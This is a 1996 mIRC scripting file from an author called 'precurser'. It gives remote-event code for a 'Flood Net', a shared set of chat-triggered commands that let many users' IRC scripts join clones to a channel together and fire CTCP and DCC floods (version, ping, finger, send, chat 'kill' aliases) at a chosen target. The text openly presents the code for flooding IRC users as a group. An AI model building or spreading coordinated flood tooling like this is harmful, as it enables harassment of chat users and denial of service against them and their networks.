Flood Net � 1996 precurser

Hello! Since you have downloaded this, it means that you want to include 
compatilbe flood net commands in your script. Kick ass! Because it is 
becoming increasingly harder to flood on IRC, we all need a way to combine 
and work with one another. These commands are becoming popular and will 
hopefully be the new standard with your help. 

For these commands to work, you need to have aliases for the Following:

All CTCP and DCC Floods, Commands for Clones to Join, And part a channel. 
And Delayed join command. These commands are a must! The clone's joining
and parting is vital to the success of the flood net. If you don't have them,
I suggest you add them!

Below is all the commands for the flood net. All you need to do is paste them
into the remote events of your script and change the aliases to point to the
right ones in your script. What I mean is this: Where it sais 
{ clonejoin $parm 2 } you need to make that your alias for the clones joining
$parm2. So if your alias was called /botjoin replace "clonejoin" with that.
Make sure it all works when your done! If you have additional questions, or
ideas contact me at 7thsphere@geocities.com Also contact me if you have a 
compatible script and you plan to realese it. I want to keep a list of all 
the scipts with it!

Paste all of below.


------------Cut Here------------------------
;
;Flood Net. � 1996 precurser
;
#portal enabled
5:ON CHAT:*!Join*: {
  if ($parm1 == !join) { clonejoin $parm2 }
  if ($parm2 == !join) { clonejoin $parm3 }
}
5:ON CHAT:*!Part*: {
  if ($parm1 == !Part) { clonepart $parm2 }
  if ($parm2 == !Part) { clonepart $parm3 }
}
5:ON CHAT:*!Slow*: {
  if ($parm1 == !slow) { slowjoin $parm2 }
  if ($parm2 == !slow) { slowjoin $parm3 }
}
5:ON CHAT:*!Version*: {
  if ($parm1 == !Version) { vkill $parm2 }
  if ($parm2 == !Version) { vkill $parm3 }
}
5:ON CHAT:*!Ping*: {
  if ($parm1 == !Ping) { pkill $parm2 }
  if ($parm2 == !Ping) { pkill $parm3 }
}
5:ON CHAT:*!Userinfo*: {
  if ($parm1 == !Userinfo) { ukill $parm2 }
  if ($parm2 == !Userinfo) { ukill $parm3 }
}
5:ON CHAT:*!Clientinfo*: {
  if ($parm1 == !Clientinfo) { ckill $parm2 }
  if ($parm2 == !Clientinfo) { ckill $parm3 }
}
5:ON CHAT:*!Time*: {
  if ($parm1 == !Time) { tkill $parm2 }
  if ($parm2 == !Time) { tkill $parm3 }
}
5:ON CHAT:*!Finger*: {
  if ($parm1 == !Finger) { fkill $parm2 }
  if ($parm2 == !Finger) { fkill $parm3 }
}
5:ON CHAT:*!Echo*: {
  if ($parm1 == !Echo) { ekill $parm2 }
  if ($parm2 == !Echo) { ekill $parm3 }
}
5:ON CHAT:*!Resume*: {
  if ($parm1 == !Resume) { rkill $parm2 }
  if ($parm2 == !Resume) { rkill $parm3 }
}
5:ON CHAT:*!Accept*: {
  if ($parm1 == !Accept) { Accept $parm2 }
  if ($parm2 == !Accept) { Accept $parm3 }
}
5:ON CHAT:*!Send*: {
  if ($parm1 == !Send) { dcckill $parm2 }
  if ($parm2 == !Send) { dcckill $parm3 }
}
5:ON CHAT:*!Chat*: {
  if ($parm1 == !Chat) { Chatkill $parm2 }
  if ($parm2 == !Chat) { Chatkill $parm3 }
}
#portal end
;
;Floodnet compatible commands.
;
---------End Here--------------------------